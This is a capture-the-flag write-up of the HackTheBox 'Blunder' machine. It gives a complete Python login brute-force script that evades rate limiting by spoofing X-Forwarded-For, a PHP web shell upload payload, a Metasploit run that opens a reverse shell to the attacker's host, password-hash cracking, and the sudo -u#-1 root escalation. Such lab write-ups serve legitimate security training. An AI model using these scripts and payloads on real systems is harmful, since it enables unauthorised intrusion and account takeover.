Posts Hackthebox Blunder writeup
Post
Cancel

Hackthebox Blunder writeup

Introduction@Blunder:~$

ColumnDetails
NameBlunder
IP10.10.10.191
Points20
OsLinux
DifficultyEasy
CreatoregotisticalSW
Out On30 May 2020

Brief@Blunder:~$

The file todo.txt tells about a username and making a custom-wordlist using cewl , Brute forcing the login using custom python script , We logged into the CMS and exploiting the bludit using manually and metasploit , We got our initial shell . And the file users.php reveals a hash by cracking it we are logged into as hugo . Privielge escalation is all about the sudo vulnerability.

Summary

  • Fuzzing the dir got a admin dir.
  • Got a todo.txt file while fuzzing with txt extension
  • Concluding the username and trying to bruteforce
  • Making a custom-wordlist from hompage using cewl
  • Brute-force the login using the python-script
  • Got the password
  • Logged in to the CMS
  • Exploiting the bludit
  • Got the initial shell as www-data
  • Got a hash from users.php
  • Cracking the hash
  • Login as hugo
  • Got user.txt
  • Exploiting the sudo vulnerabilty
  • Got shell as root
  • Got root.txt

Pwned

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
➜  blunder nmap -sC -sV -p- -v -oA scans/nmap-full -T4 blunder.htb
# Nmap 7.70 scan initiated Sun May 31 06:12:22 2020 as: nmap -sC -sV -p- -v -oA scans/nmap-full -T4 blunder.htb
Nmap scan report for blunder.htb (10.10.10.191)
Host is up (0.32s latency).
Not shown: 65533 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 31 06:17:24 2020 -- 1 IP address (1 host up) scanned in 302.14 seconds

Only 1 port 80:http is opened so , I need to only stick to this one and ftp is closed.

Wfuzz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
➜  prashant wfuzz -u http://blunder.htb/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,403 --hh 7561

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzzs documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://blunder.htb/FUZZ
Total requests: 220560

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000026:  C=200    105 L      303 W         3280 Ch        "about"
000259:  C=301      0 L        0 W            0 Ch        "admin"
002551:  C=200    110 L      387 W         3959 Ch        "usb"
003295:  C=200     21 L      171 W         1083 Ch        "LICENSE"

Here are some interesting dirs i got

/about

About-page

/admin

Admin-page

This is what we needed a login panel , Tried some defaults credenatials like admin:admin But didnt work at all….

Now i will just fuzz for some files if they do exists….. the extension i would like to fuzz

php , html ,txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
➜  prashant wfuzz -u http://blunder.htb/FUZZ.FUZ2Z -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z list,php-txt-html --hc 404,403 --hh 7561

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzzs documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://blunder.htb/FUZZ.FUZ2Z
Total requests: 441120

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

001429:  C=200      0 L        5 W           30 Ch        "install - php"
003530:  C=200      1 L        4 W           22 Ch        "robots - txt"
004990:  C=200      4 L       23 W          118 Ch        "todo - txt"

And got some interesting files

install.php

install.php

From this file and the admin dir we can conclude that the web app we are seeing is build with BLUDIT

https://www.bludit.com/

robots.txt

1
2
User-agent: *
Allow: /

Nothing interesting

todo.txt

1
2
3
4
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

I can cleraly saw that Why ftp port is closed on nmap o/p.

And there is the last line which is refering to uploading some images to the blog….. The user is fergus , The user fergus only can upload images if he has access to the CMS. (Common sense) So the username we are looking for is fergus.

But i still need a correct password……Lets bruteforce thats the only way

Brute - Force the login

I tried to bruteforce with wfuzz , hydra , Burp-intruder But no success tbh

Then i start searching about it on the google…..and luckily got a blog which is describing the same thing i was looking for…..

https://rastating.github.io/bludit-brute-force-mitigation-bypass/

The poc that the user is using is this.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#!/usr/bin/env python3
import re
import requests

host = 'http://192.168.194.146/bludit'
login_url = host + '/admin/login'
username = 'admin'
wordlist = []

# Generate 50 incorrect passwords
for i in range(50):
    wordlist.append('Password{i}'.format(i = i))

# Add the correct password to the end of the list
wordlist.append('adminadmin')

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

Things i am going to edit are

  • wordlist
  • host
  • username

And everyting else is right

Final script —-

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/env python3
import re
import requests
#from __future__ import print_function

def open_ressources(file_path):
    return [item.replace("\n", "") for item in open(file_path).readlines()]

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_ressources('/usr/share/wordlists/rockyou.txt')

'''# Generate 50 incorrect passwords
for i in range(50):
    wordlist.append('Password{i}'.format(i = i))

# Add the correct password to the end of the list
wordlist.append('adminadmin')
'''
for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

Run the script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
➜  blunder python bf.py
[*] Trying: 123456
[*] Trying: 12345
[*] Trying: 123456789
[*] Trying: password
[*] Trying: iloveyou
[*] Trying: princess
[*] Trying: 1234567
[*] Trying: rockyou
[*] Trying: 12345678
[*] Trying: abc123
[*] Trying: nicole
[*] Trying: daniel
[*] Trying: babygirl
[*] Trying: monkey
[*] Trying: lovely
[*] Trying: jessica
[*] Trying: 654321
[*] Trying: michael
[*] Trying: ashley
[*] Trying: qwerty
[*] Trying: 111111
[*] Trying: iloveu
[*] Trying: 000000
[*] Trying: michelle
[*] Trying: tigger
[*] Trying: sunshine
[*] Trying: chocolate
[*] Trying: password1
[*] Trying: soccer
[*] Trying: anthony

But after half an hour i concluded that this wordlist is not going to work and the brute-force is still running , Because any machine that do exists on hackthebox don’t take that much time !!

So , the only thing i can do now is make a custom wordlist using cewl.

First i will make wordlist from the hompage of the web app..

1
2
3
4
➜  blunder cewl -d 3 -m 4 -w wordlist.txt http://blunder.htb/

CeWL 5.4.4.1 (Arkanoid) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
➜  blunder

Minimum 4 char will be good to go

And edit the script and specify the wordlist.txt as wordlist and run the script again

1
2
3
4
5
6
[*] Trying: character
[*] Trying: RolandDeschain
()
SUCCESS: Password found!
Use fergus:RolandDeschain to login.
()

The password we got RolandDeschain

And specify the creds to login successfuly

dasboard.php

While i was searching for bludit default credentials i got a blog describing the reset of password…

https://forum.bludit.org/viewtopic.php?t=767

This article shows me some good information about there is a dir called /bl-content

bludit

And i actually access the dir Congo !!

Dir

But if i will try to access any of the dir it just show this

404

Now i searched for some exploits on searchsploit

1
2
3
4
5
6
7
8
9
➜  prashant searchsploit bludit                
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                      |  Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Bludit - Directory Traversal Image File Upload (Metasploit)                                                         | php/remote/47699.rb
bludit Pages Editor 3.0.0 - Arbitrary File Upload                                                                   | php/webapps/46060.txt
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
➜  prashant

So there are two available exploits one is a txt file which is just a manual way to do the exploation , And one more that is a metasploit module i added the module to my metasploit manually.

https://medium.com/@pentest_it/how-to-add-a-module-to-metasploit-from-exploit-db-d389c2a33f6d

And now its time for exploit…lets go

Exploiting bludit without metasploit

I want to the machine with and without msf both

https://www.exploit-db.com/exploits/46060

This exploit talks about the manual way….

What i need to do is upload a new image and rename it while uploading using burp

And i uploaded a php file after renaming it to prashant.php.png

Upload

404

Request

404

edit the request

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
------WebKitFormBoundary3L4gkQQhwBAlCAUz
Content-Disposition: form-data; name="images[]"; filename="prashant.php"
Content-Type: image/png

<?php system($_GET["cmd"]);?>

------WebKitFormBoundary3L4gkQQhwBAlCAUz
Content-Disposition: form-data; name="uuid"

42487f505f6dfdc5454bb1cf4c318a23
------WebKitFormBoundary3L4gkQQhwBAlCAUz
Content-Disposition: form-data; name="tokenCSRF"

eb251356a346e0eece8f67911125cc0e3c8e018f
------WebKitFormBoundary3L4gkQQhwBAlCAUz--

And i uploaded it

404

This is just detected it……

Exploiting bludit with metasploit

Meterpreter shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
msf5 exploit(php/remote/47699) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(php/remote/47699) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(php/remote/47699) > set RHOSTS 10.10.10.191
RHOSTS => 10.10.10.191
msf5 exploit(php/remote/47699) > run

[*] Started reverse TCP handler on 10.10.14.4:4444 
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading cPdfqusytu.png...
[*] Uploading .htaccess...
[*] Executing cPdfqusytu.png...
[*] Sending stage (38247 bytes) to 10.10.10.191
[*] Meterpreter session 2 opened (10.10.14.4:4444 -> 10.10.10.191:45244) at 2020-05-31 12:37:39 -0400
[+] Deleted .htaccess

meterpreter >

Shell as www-data

1
2
3
4
5
6
7
8
meterpreter > shell
Process 7862 created.
Channel 0 created.
python -c "import pty;pty.spawn('/bin/sh')"
$ whoami
whoami
www-data
$

Got my prashant.php file

As i spawned the shell….

I found the file that i try to upload here prashant.php

1
2
3
4
5
6
7
8
9
10
11
$ ls -la
ls -la
total 20
drwxr-xr-x 4 www-data www-data 4096 May 31 08:55 .
drwxr-xr-x 7 www-data www-data 4096 Nov 27  2019 ..
-rw------- 1 www-data www-data   30 May 31 08:53 prashant.php
drwxr-xr-x 3 www-data www-data 4096 May 31 05:22 temp
drwxr-xr-x 2 www-data www-data 4096 May 31 08:48 thumbnails
$ pwd
pwd
/var/www/bludit-3.9.2/bl-content/tmp

So the conclusion is that the file that dont upload or detect by the image filteration are saved here…

I tried to access my file on browser too…But again that file not found

Well !! move on

Escalation to Hugo

There are two users in the home dir and the user that conatins the user.txt

1
2
3
4
5
6
7
$ ls -la
ls -la
total 16
drwxr-xr-x  4 root  root  4096 Apr 27 14:31 .
drwxr-xr-x 21 root  root  4096 Apr 27 14:09 ..
drwxr-xr-x 16 hugo  hugo  4096 May 26 09:29 hugo
drwxr-xr-x 16 shaun shaun 4096 Apr 28 12:13 shaun
1
2
3
4
$ ls  
ls 
Desktop    Downloads  Pictures  Templates  user.txt
Documents  Music      Public    Videos

So we need to find a way to be hugo

The article i already mentioned is worked here …

404

So there is file called users.php in the databases dir

But this file doesnt contain anything that can be relate to the hugo

There is one more bludit dir in /var/www/ called bludit-3.10.0a

And its looking like a backup dir , And its user.php has the hugo user credentials

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}

And here we got a password

1
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",

Its lokking like sha-1 and we can confirm it with hash-identifier

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
➜  blunder hash-identifier                                                                                                                            
   #########################################################################                                                                          
   #     __  __                     __           ______    _____           #                                                                          
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #                                                                          
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #                                                                          
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #                                                                          
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #                                                                          
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #                                                                          
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #                                                                          
   #                                                             By Zion3R #                                                                          
   #                                                    www.Blackploit.com #                                                                          
   #                                                   Root@Blackploit.com #                                                                          
   #########################################################################                                                                          
                                                                                                                                                      
   -------------------------------------------------------------------------                                                                          
 HASH: faca404fd5c0a31cf1897b823c695c85cffeb98d                                                                                                       
                                                                                                                                                      
Possible Hashs:
[+]  SHA-1
[+]  MySQL5 - SHA-1(SHA-1($pass))

I cracked the hash online

hash-crack

And we got the plaintext of hash Password120

Login as hugo

I can switch to hugo without any problem

1
2
3
4
5
$ su - hugo
su - hugo
Password: Password120

hugo@blunder:~$

Got user.txt

1
2
3
4
hugo@blunder:~$ cat user.txt
cat user.txt
2d-------------------------2cb
hugo@blunder:~$ 

Privilege escalation to root

Well this is very populer and easy privilege escalation , That is populer sudo vulnerabilty

1
2
3
4
5
6
7
8
9
10
hugo@blunder:~$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

After seeing that !root i immediately think of the sudo vuln

And sudo version confirms it too….

1
2
3
4
5
6
7
hugo@blunder:~$ sudo --version
sudo --version
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
hugo@blunder:~$

Here is the exploit available for the sudo version.

https://www.exploit-db.com/exploits/47502

We just need a simple trick to bypass the sudo thing….

1
sudo -u#-1 /bin/bash

Got shell as root

1
2
3
hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo#

Got root.txt

1
2
3
4
root@blunder:/root# cat root.txt
cat root.txt
27c21392093269151aedec2f7a13d2b3
root@blunder:/root#

And we pwned it …….

If u liked the writeup.Support a Poor Student to Get the OSCP-Cert Donation for OSCP

If you want to get notified as soon as i upload something new to my blog So just click on the bell icon you are seeing on the right side – > and allow push notification

Resources

This post is licensed under CC BY 4.0 by the author.

© 2021 Prashant Saini.